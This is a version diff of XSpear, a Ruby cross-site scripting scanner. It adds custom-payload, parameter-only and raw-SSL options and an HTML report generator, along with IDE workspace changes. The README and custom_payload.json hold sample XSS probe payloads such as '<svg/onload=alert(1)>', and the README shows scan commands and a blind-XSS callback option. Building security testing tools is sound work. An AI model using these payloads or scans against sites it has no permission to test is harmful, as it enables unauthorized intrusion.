XSpear 1.3.3 → 1.4.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: afb284c2c76350733a45156127bde1e8fd996a6aabf985b3eef8a1b43e8147a7
-  data.tar.gz: f4411c5bdfb84d3ad32a87f34e1ffcd98a7ead48761b07134fcc82f5ded53f5b
+  metadata.gz: 32c726b87b11934044cacd01471bedab0f407185be09ba5018ec7f127d2f111d
+  data.tar.gz: 1faaf797b99c0e23a7280071c8cd9f010ff23c94dfd29d08edb116bb08b65b0e
 SHA512:
-  metadata.gz: e031af8d10adfcdb511df45e0e9a34c19df1fdcbfc4bdcaf9179c584f25cf66df9d805204b85a8ef3c108495fa663c6e78dcc861549532d48556b867c9e5f65e
-  data.tar.gz: 9dcd8c46a718c459ab7d2b8ebc8a8e4e9181a51d7d0c1c4280219bd3502caa16ea48cbfeb6a3ca02a6fc21d226606801a704ba77824d89bcd07150c3833d3cd8
+  metadata.gz: 607af7c1efc237340f376e87a603f5d0f8715de74d0dfa85ca139d1f85406dd3fc2f839b75cb4e9681c2ee3c63e7ced219d1364bc61de7717506a5c63c13c76e
+  data.tar.gz: 8d5e0667c104e834e3ea7a87ed9f4a79eca542dbc7c039083fc5c425a40460bc960db03f1aa65bc8522a44a0d0d8e6a55f8736f9da721e6445bca88656f61d27

data/.idea/workspace.xml

@@ -3,6 +3,8 @@
   <component name="ChangeListManager">
     <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
       <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
       <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
     </list>
     <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -19,29 +21,26 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/exe/XSpear">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="900">
-              <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
+            <state relative-caret-position="1084">
+              <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
             </state>
           </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/README.md">
-          <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
-            <state split_layout="SPLIT">
-              <first_editor relative-caret-position="6840">
-                <caret line="456" column="38" selection-start-line="456" selection-start-column="38" selection-end-line="456" selection-end-column="38" />
-              </first_editor>
-              <second_editor />
+        <entry file="file://$PROJECT_DIR$/raw_sample.txt">
+          <provider selected="true" editor-type-id="text-editor">
+            <state relative-caret-position="30">
+              <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
             </state>
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="false">
+      <file pinned="false" current-in-tab="true">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="1095">
-              <caret line="73" selection-start-line="73" selection-end-line="73" />
+            <state relative-caret-position="217">
+              <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
             </state>
           </provider>
         </entry>
@@ -49,31 +48,35 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="316">
-              <caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
+            <state relative-caret-position="260">
+              <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
             </state>
           </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/bin/console">
-          <provider selected="true" editor-type-id="text-editor" />
+        <entry file="file://$PROJECT_DIR$/report.html">
+          <provider selected="true" editor-type-id="text-editor">
+            <state relative-caret-position="75">
+              <caret line="5" selection-start-line="5" selection-end-line="5" />
+            </state>
+          </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
+        <entry file="file://$PROJECT_DIR$/custom_payload.json">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="195">
-              <caret line="13" column="38" selection-start-line="13" selection-start-column="38" selection-end-line="13" selection-end-column="38" />
+            <state relative-caret-position="150">
+              <caret line="10" column="3" selection-start-line="10" selection-start-column="3" selection-end-line="10" selection-end-column="3" />
             </state>
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="true">
+      <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
           <provider selected="true" editor-type-id="text-editor">
             <state relative-caret-position="15">
-              <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+              <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
             </state>
           </provider>
         </entry>
@@ -113,7 +116,6 @@
   <component name="FindInProjectRecents">
     <findStrings>
       <find>BLINDNOTDETECTED</find>
-      <find>@all</find>
       <find>@reflected_params</find>
       <find>@thread</find>
       <find>thread</find>
@@ -126,6 +128,8 @@
       <find>EH</find>
       <find>CSP</find>
       <find>URI::encode</find>
+      <find>@all</find>
+      <find>for reflected</find>
     </findStrings>
   </component>
   <component name="Git.Settings">
@@ -135,24 +139,27 @@
     <option name="CHANGED_PATHS">
       <list>
         <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
-        <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
         <option value="$PROJECT_DIR$/config.json" />
         <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
-        <option value="$PROJECT_DIR$/exe/XSpear" />
         <option value="$PROJECT_DIR$/README.md" />
         <option value="$PROJECT_DIR$/XSpear.gemspec" />
         <option value="$PROJECT_DIR$/forBurp/otwa.sh" />
         <option value="$PROJECT_DIR$/forBurp/README.md" />
-        <option value="$PROJECT_DIR$/lib/XSpear.rb" />
+        <option value="$PROJECT_DIR$/raw_sample.txt" />
+        <option value="$PROJECT_DIR$/exe/XSpear" />
+        <option value="$PROJECT_DIR$/report.html" />
+        <option value="$PROJECT_DIR$/custom_payload.json" />
         <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
+        <option value="$PROJECT_DIR$/lib/XSpear.rb" />
+        <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
       </list>
     </option>
   </component>
-  <component name="ProjectFrameBounds">
+  <component name="ProjectFrameBounds" extendedState="6">
     <option name="x" value="-1920" />
-    <option name="y" value="-620" />
+    <option name="y" value="-643" />
     <option name="width" value="1920" />
-    <option name="height" value="1057" />
+    <option name="height" value="1080" />
   </component>
   <component name="ProjectLevelVcsManager" settingsEditedManually="true">
     <ConfirmationsSetting value="2" id="Add" />
@@ -162,6 +169,7 @@
       <foldersAlwaysOnTop value="true" />
     </navigator>
     <panes>
+      <pane id="Scope" />
       <pane id="ProjectPane">
         <subPane>
           <expand>
@@ -199,7 +207,6 @@
           <select />
         </subPane>
       </pane>
-      <pane id="Scope" />
     </panes>
   </component>
   <component name="PropertiesComponent">
@@ -266,63 +273,8 @@
       <workItem from="1577115206395" duration="21990000" />
       <workItem from="1580314696983" duration="286000" />
       <workItem from="1580583824837" duration="1470000" />
-      <workItem from="1581089876742" duration="268000" />
-    </task>
-    <task id="LOCAL-00030" summary="(1.0.6)[fixed #6] Edit Static Analysis code">
-      <created>1563893769120</created>
-      <option name="number" value="00030" />
-      <option name="presentableId" value="LOCAL-00030" />
-      <option name="project" value="LOCAL" />
-      <updated>1563893769120</updated>
-    </task>
-    <task id="LOCAL-00031" summary="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정">
-      <created>1563893901111</created>
-      <option name="number" value="00031" />
-      <option name="presentableId" value="LOCAL-00031" />
-      <option name="project" value="LOCAL" />
-      <updated>1563893901111</updated>
-    </task>
-    <task id="LOCAL-00032" summary="(1.0.6)[fixed #4] Report 객체 수정">
-      <created>1563894048747</created>
-      <option name="number" value="00032" />
-      <option name="presentableId" value="LOCAL-00032" />
-      <option name="project" value="LOCAL" />
-      <updated>1563894048747</updated>
-    </task>
-    <task id="LOCAL-00033" summary="(1.0.6)[fixed #8] Added response header analysis module">
-      <created>1563894186608</created>
-      <option name="number" value="00033" />
-      <option name="presentableId" value="LOCAL-00033" />
-      <option name="project" value="LOCAL" />
-      <updated>1563894186608</updated>
-    </task>
-    <task id="LOCAL-00034" summary="(1.0.6)[fixed #9] Added method in report-cli">
-      <created>1563894430592</created>
-      <option name="number" value="00034" />
-      <option name="presentableId" value="LOCAL-00034" />
-      <option name="project" value="LOCAL" />
-      <updated>1563894430592</updated>
-    </task>
-    <task id="LOCAL-00035" summary="(1.0.6) Edit report &amp; scanning format">
-      <created>1563895638242</created>
-      <option name="number" value="00035" />
-      <option name="presentableId" value="LOCAL-00035" />
-      <option name="project" value="LOCAL" />
-      <updated>1563895638242</updated>
-    </task>
-    <task id="LOCAL-00036" summary="(1.0.6)[fixed #5] Add blind-xss other pattern">
-      <created>1563895850670</created>
-      <option name="number" value="00036" />
-      <option name="presentableId" value="LOCAL-00036" />
-      <option name="project" value="LOCAL" />
-      <updated>1563895850670</updated>
-    </task>
-    <task id="LOCAL-00037" summary="(1.0.6) Releases 1.0.6 version">
-      <created>1563896026689</created>
-      <option name="number" value="00037" />
-      <option name="presentableId" value="LOCAL-00037" />
-      <option name="project" value="LOCAL" />
-      <updated>1563896026689</updated>
+      <workItem from="1581089876742" duration="615000" />
+      <workItem from="1581425741728" duration="13911000" />
     </task>
     <task id="LOCAL-00038" summary="(1.0.6) Edit README.md">
       <created>1563896886094</created>
@@ -611,11 +563,67 @@
       <option name="project" value="LOCAL" />
       <updated>1581090128596</updated>
     </task>
-    <option name="localTasksCounter" value="79" />
+    <task id="LOCAL-00079" summary="Release 1.3.3 (Added New XSS Payloads)">
+      <created>1581090457081</created>
+      <option name="number" value="00079" />
+      <option name="presentableId" value="LOCAL-00079" />
+      <option name="project" value="LOCAL" />
+      <updated>1581090457081</updated>
+    </task>
+    <task id="LOCAL-00080" summary="(1.4 / Closed #51) Added only param analysis options">
+      <created>1581426071038</created>
+      <option name="number" value="00080" />
+      <option name="presentableId" value="LOCAL-00080" />
+      <option name="project" value="LOCAL" />
+      <updated>1581426071038</updated>
+    </task>
+    <task id="LOCAL-00081" summary="(1.4 / Closed #51) Added only param analysis options">
+      <created>1581427060990</created>
+      <option name="number" value="00081" />
+      <option name="presentableId" value="LOCAL-00081" />
+      <option name="project" value="LOCAL" />
+      <updated>1581427060990</updated>
+    </task>
+    <task id="LOCAL-00082" summary="(1.4 / Closed #41) Added custom payload option">
+      <created>1581428107580</created>
+      <option name="number" value="00082" />
+      <option name="presentableId" value="LOCAL-00082" />
+      <option name="project" value="LOCAL" />
+      <updated>1581428107580</updated>
+    </task>
+    <task id="LOCAL-00083" summary="(1.4 / Closed #41) Added custom payload option">
+      <created>1581428482520</created>
+      <option name="number" value="00083" />
+      <option name="presentableId" value="LOCAL-00083" />
+      <option name="project" value="LOCAL" />
+      <updated>1581428482520</updated>
+    </task>
+    <task id="LOCAL-00084" summary="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl">
+      <created>1581430796984</created>
+      <option name="number" value="00084" />
+      <option name="presentableId" value="LOCAL-00084" />
+      <option name="project" value="LOCAL" />
+      <updated>1581430796984</updated>
+    </task>
+    <task id="LOCAL-00085" summary="(1.4 / Closed #52) Added HTML Report">
+      <created>1581529060550</created>
+      <option name="number" value="00085" />
+      <option name="presentableId" value="LOCAL-00085" />
+      <option name="project" value="LOCAL" />
+      <updated>1581529060550</updated>
+    </task>
+    <task id="LOCAL-00086" summary="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정">
+      <created>1581530432559</created>
+      <option name="number" value="00086" />
+      <option name="presentableId" value="LOCAL-00086" />
+      <option name="project" value="LOCAL" />
+      <updated>1581530432559</updated>
+    </task>
+    <option name="localTasksCounter" value="87" />
     <servers />
   </component>
   <component name="TimeTrackingManager">
-    <option name="totallyTimeSpent" value="76057000" />
+    <option name="totallyTimeSpent" value="90315000" />
   </component>
   <component name="TodoView">
     <todo-panel id="selected-file">
@@ -627,10 +635,10 @@
     </todo-panel>
   </component>
   <component name="ToolWindowManager">
-    <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
+    <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
     <editor active="true" />
     <layout>
-      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.1368477" />
+      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13791268" />
       <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
       <window_info id="Favorites" order="2" side_tool="true" />
       <window_info anchor="bottom" id="Message" order="0" />
@@ -656,12 +664,6 @@
     <option name="version" value="1" />
   </component>
   <component name="VcsManagerConfiguration">
-    <MESSAGE value="(1.1.1) Add code level function &amp; Check WAF code frame" />
-    <MESSAGE value="(1.1.2) Releases &amp; Fixed #17 (Add some event handlers..)" />
-    <MESSAGE value="(1.1.3) Releases &amp; Fixed #18 (Add onload* event handler)" />
-    <MESSAGE value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
-    <MESSAGE value="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3" />
-    <MESSAGE value="(1.1.4) Released 1.1.4" />
     <MESSAGE value="(1.1.5)(Fixed #21) not reflected params , no testing. but alway blind xss, other bug fix" />
     <MESSAGE value="(1.1.5) Released 1.1.5" />
     <MESSAGE value="(1.1.6) (Fixed #24) Edit Usage" />
@@ -681,7 +683,13 @@
     <MESSAGE value="Released 1.3.2" />
     <MESSAGE value="(Fixed #49) Add onpointerrawupdate event handler for xss" />
     <MESSAGE value="(Fixed #50) Add SVG Animate XSS Payload" />
-    <option name="LAST_COMMIT_MESSAGE" value="(Fixed #50) Add SVG Animate XSS Payload" />
+    <MESSAGE value="Release 1.3.3 (Added New XSS Payloads)" />
+    <MESSAGE value="(1.4 / Closed #51) Added only param analysis options" />
+    <MESSAGE value="(1.4 / Closed #41) Added custom payload option" />
+    <MESSAGE value="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl" />
+    <MESSAGE value="(1.4 / Closed #52) Added HTML Report" />
+    <MESSAGE value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
+    <option name="LAST_COMMIT_MESSAGE" value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
   </component>
   <component name="editorHistoryManager">
     <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -741,13 +749,6 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/exe/XSpear">
-      <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="900">
-          <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/README.md">
       <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
         <state split_layout="SPLIT">
@@ -758,13 +759,6 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
-      <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="1095">
-          <caret line="73" selection-start-line="73" selection-end-line="73" />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/bin/console">
       <provider selected="true" editor-type-id="text-editor" />
     </entry>
@@ -799,17 +793,52 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+    <entry file="file://$PROJECT_DIR$/raw_sample.txt">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="316">
-          <caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
+        <state relative-caret-position="30">
+          <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/report.html">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="75">
+          <caret line="5" selection-start-line="5" selection-end-line="5" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/custom_payload.json">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="150">
+          <caret line="10" column="3" selection-start-line="10" selection-start-column="3" selection-end-line="10" selection-end-column="3" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/exe/XSpear">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="1084">
+          <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
         </state>
       </provider>
     </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
       <provider selected="true" editor-type-id="text-editor">
         <state relative-caret-position="15">
-          <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+          <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="260">
+          <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="217">
+          <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
         </state>
       </provider>
     </entry>

data/README.md

@@ -33,12 +33,14 @@ XSpear is XSS Scanner on ruby gems
   + Reflected Params
   + All params(for blind xss, anytings)
   + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
+  + Testing custom payload for only you!
 - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
 - Dynamic/Static Analysis
   + Find SQL Error pattern
   + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
   + Analysis Other headers..(Server version, Content-Type, etc...)
   + XSS Testing to URI Path
+  + Testing Only Parameter Analysis (aka no-XSS mode)
 - Scanning from Raw file(Burp suite, ZAP Request)
 - XSpear running on ruby code(with Gem library)
 - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
@@ -90,14 +92,17 @@ $ gem install progress_bar
 Usage: xspear -u [target] -[options] [value]
 [ e.g ]
 $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a 
-$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
+$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
+$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json
 
 [ Options ]
     -u, --url=target_URL             [required] Target Url
     -d, --data=POST Body             [optional] POST Method Body data
     -a, --test-all-params            [optional] test to all params(include not reflected)
+        --no-xss                     [optional] no testing xss, only parameters analysis
         --headers=HEADERS            [optional] Add HTTP Headers
         --cookie=COOKIE              [optional] Add Cookie
+        --custom-payload=FILENAME    [optional] Load custom payload json file
         --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
     -p, --param=PARAM                [optional] Test paramters
     -b, --BLIND=URL                  [optional] Add vector of Blind XSS
@@ -115,6 +120,7 @@ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
         --version                    Show XSpear version
         --update                     Show how to update
 
+
 ```
 ### Result types
 - (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
@@ -198,7 +204,6 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
 ```
 
-
 **Set scanning thread**
 ```
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
@@ -215,6 +220,11 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhah
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
 ```
 
+**Testing Only parameter analysis (aka no-xss mode)**<br>
+```
+$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" --no-xss
+```
+
 **Testing blind xss(all params)**<br>
 (Should be used as much as possible because Blind XSS is everywhere)<br>
 ```
@@ -223,6 +233,31 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwu
 # Set your blind xss host. <-b options>
 ```
 
+**Testing custom payload**<br>
+```
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" --custom-payload=custom_payload.json 
+```
+in custom_payload.json file
+```json
+[
+  {
+    "payload":"<svg/onload=alert(1)>",
+    "callback":"P1",
+    "descript":"blahblah~"
+  },
+  {
+    "payload":"<svg/onload=alert(1)>",
+    "callback":"P2",
+    "descript":"blahblah~"
+  },
+  {
+    "payload":"<>",
+    "callback":"P1",
+    "descript":"blahblah~"
+  }
+]
+```
+
 **for Pipeline**<br>
 ```
 $ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json

data/custom_payload.json

@@ -0,0 +1,17 @@
+[
+  {
+    "payload":"<svg/onload=alert(1)>",
+    "callback":"P1",
+    "descript":"blahblah~"
+  },
+  {
+    "payload":"<svg/onload=alert(1)>",
+    "callback":"P2",
+    "descript":"blahblah~"
+  },
+  {
+    "payload":"<>",
+    "callback":"P1",
+    "descript":"blahblah~"
+  }
+]

data/exe/XSpear

@@ -3,6 +3,10 @@ require "XSpear"
 
 XOptions = Struct.new(:url, :data, :headers, :params, :options)
 
+def true?(obj)
+  obj.to_s.downcase == "true"
+end
+
 class Parser
   def self.parse(options)
     args = XOptions.new('xspear')
@@ -29,6 +33,10 @@ class Parser
         args.options['all'] = true
       end
 
+      opts.on('--no-xss', '[optional] no testing xss, only parameters analysis') do
+        args.options['nx'] = true
+      end
+
       opts.on('--headers=HEADERS', '[optional] Add HTTP Headers') do |n|
         args.options['headers'] = n
       end
@@ -38,11 +46,17 @@ class Parser
         args.options['cookie'] = 'Cookie: ' + n
       end
 
+      opts.on('--custom-payload=FILENAME', '[optional] Load custom payload json file') do |n|
+        args.options['cp'] = n
+      end
 
       opts.on('--raw=FILENAME', '[optional] Load raw file(e.g raw_sample.txt)') do |n|
         args.options['raw'] = n
       end
 
+      opts.on('--raw-ssl=BOOLEAN', '[optional] http/https switch for burp raw file e.g: true/false') do |n|
+        args.options['raw-ssl'] = n
+      end
 
       opts.on('-p', '--param=PARAM', '[optional] Test paramters') do |n|
         args.options['params'] = n
@@ -58,7 +72,7 @@ class Parser
       end
 
 
-      opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json)') do |n|
+      opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json, html)') do |n|
         args.options['output'] = n
       end
 
@@ -129,15 +143,23 @@ if !options.options['raw'].nil?
         end
       end
     end
-
     # Burp or ZAP
     # http, https로 시작하면 zap 아니면 burp 포맷
     url = ""
     if (path.index('http://') == 0 || path.index('https://') == 0)
       url = path
     else
-      url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
+      if options.options['raw-ssl'].nil?
+        url = "https://"+headers_hash['Host'].to_s.chomp!+"/"+path
+      else
+        if true? options.options['raw-ssl']
+          url = "https://"+headers_hash['Host'].to_s.chomp!+"/"+path
+        else
+          url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
+        end
+      end
     end
+    puts url
     options.url = url
     if headers.length > 0
       options.options['headers'] = headers

data/lib/XSpear/XSpearRepoter.rb

@@ -1,4 +1,5 @@
 require 'terminal-table'
+require 'cgi'
 
 IssueStruct = Struct.new(:id, :type, :issue, :method, :param, :payload, :description)
 class IssueStruct
@@ -29,7 +30,7 @@ class XspearRepoter
     # desc
     # category
     # callback
-    @rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MIDUM".yellow,"h"=>"HIGH".light_red}
+    @rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MEDIUM".yellow,"h"=>"HIGH".light_red}
     @rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
   end
 
@@ -62,6 +63,356 @@ class XspearRepoter
     @endtime = Time.now
   end
 
+  def to_html
+    rurl = ""
+    if @url.length > 66
+      rurl = @url[0..66]+"... (snip)"
+    else
+      rurl = @url
+    end
+    t_info= "Testing to <a href='#{CGI.escapeHTML @url}'>#{CGI.escapeHTML rurl}</a><br>Found #{@issue.length} issues and running on #{@starttime} ~ #{@endtime} "
+    t_issue = ""
+    t_available = ""
+    t_rawquery = ""
+    @issue.each do |i|
+      i[1] = i[1].uncolorize
+      i[6] = i[6].uncolorize
+      # NO TYPE ISSUE METHOD PARAM PAYLOAD DESCRIPTION
+      t_issue = t_issue + "<tr class='#{i[1]} ISSUE'><td>#{i[0]}</td><td>#{i[1]}</td><td>#{CGI.escapeHTML i[2]}</td><td>#{i[3]}</td><td>#{CGI.escapeHTML i[4]}</td><td>#{CGI.escapeHTML i[5]}</td><td>#{CGI.escapeHTML i[6]}</td></tr>" #(i[0],i[1],i[2],i[3],i[4],i[5],i[6])
+    end
+    @filtered_objects.each do |key, value|
+      begin
+        eh = []
+        tag = []
+        sc = []
+        uc = []
+        t_available = t_available + "<code>#{key}</code> param<br>"
+        value.each do |n|
+          if n.include? "=64"
+            # eh
+            eh.push n.chomp("=64")
+          elsif n.include? "xsp<"
+            # tag
+            n = n.sub("xsp<","")
+            tag.push n.chomp(">")
+          elsif n.include? ".xspear"
+            # uc
+            uc.push n.sub(".xspear","")
+          else
+            # sc
+            sc.push n.sub("XsPeaR","")
+          end
+        end
+        as = ""#sc.map(&:inspect).join(',')
+        ae = ""#eh.map(&:inspect).join(',')
+        at = ""#tag.map(&:inspect).join(',')
+        ac = ""#uc.map(&:inspect).join(',')
+
+        sc.each do |z|
+          as = as + "<code>#{CGI.escapeHTML z}</code> "
+        end
+        eh.each do |z|
+          ae = ae + "<code>#{CGI.escapeHTML z}</code> "
+        end
+        tag.each do |z|
+          at = at + "<code>#{CGI.escapeHTML z}</code> "
+        end
+        uc.each do |z|
+          ac = ac + "<code>#{CGI.escapeHTML z}</code> "
+        end
+
+        t_available = t_available + """
+        <table>
+            <tr>
+                <td width='50%'>
+                    <table>
+                        <tr>
+                            <td>Category</td>
+                            <td>Data</td>
+                        </tr>
+                        <tr><td style='width:150px;'>HTML Tag</td><td>#{at}</td></tr>
+                        <tr><td style='width:150px;'>Useful Code</td><td>#{ac}</td></tr>
+                        <tr><td style='width:150px;'>Special Char</td><td>#{as}</td></tr>
+
+                    </table>
+                </td>
+                <td><table>
+                    <tr>
+                        <td>Category</td>
+                        <td>Data</td>
+                        <tr><td style='width:150px;'>Event Handler</td><td>#{ae}</td></tr>
+                    </tr>
+
+                </table>
+                </td>
+            </tr>
+        </table>
+        """
+      rescue
+      end
+    end
+    if @filtered_objects.length == 0
+    end
+    begin
+      @query.each_with_index do |q, i|
+        html_q = "#{@url.sub(URI.parse(@url).query,"")}"+q
+        t_rawquery = t_rawquery + "<li><a href='#{CGI.escapeHTML html_q}'>[#{i}] #{CGI.escapeHTML html_q}</a></li>"
+      end
+    rescue
+    end
+    report = """
+      <style>
+          @import url(https://fonts.googleapis.com/css?family=Lato:100,300,400,700);
+          @import url(https://maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css);
+
+          html {
+              height: 100%;
+              font-family: 'Lato', sans-serif;
+              -webkit-user-select: none;
+              color:rgba(255, 255, 255, 0.4);
+          }
+          body {
+              height: 100%;
+              margin: 0;
+              background: #252C33;
+          }
+          * {
+              box-sizing: border-box;
+              word-break: keep-all;
+          }
+
+          ::-webkit-scrollbar {
+              min-width: 12px;
+              width: 12px;
+              max-width: 12px;
+              min-height: 12px;
+              height: 12px;
+              max-height: 12px;
+              background-color: #252C33;
+          }
+          ::-webkit-scrollbar-thumb {
+              background: rgba(255,255,255,0.1);
+              border: solid 3px #252C33;
+              border-radius: 100px;
+          }
+          ::-webkit-scrollbar-thumb:hover {
+              background: rgba(255,255,255,0.2);
+          }
+          ::-webkit-scrollbar-thumb:active {
+              background: rgba(255,255,255,0.2);
+          }
+          ::-webkit-scrollbar-button {
+              display: none;
+              height: 0px;
+          }
+
+          /* CONTAINER */
+          #container {
+              display: table;
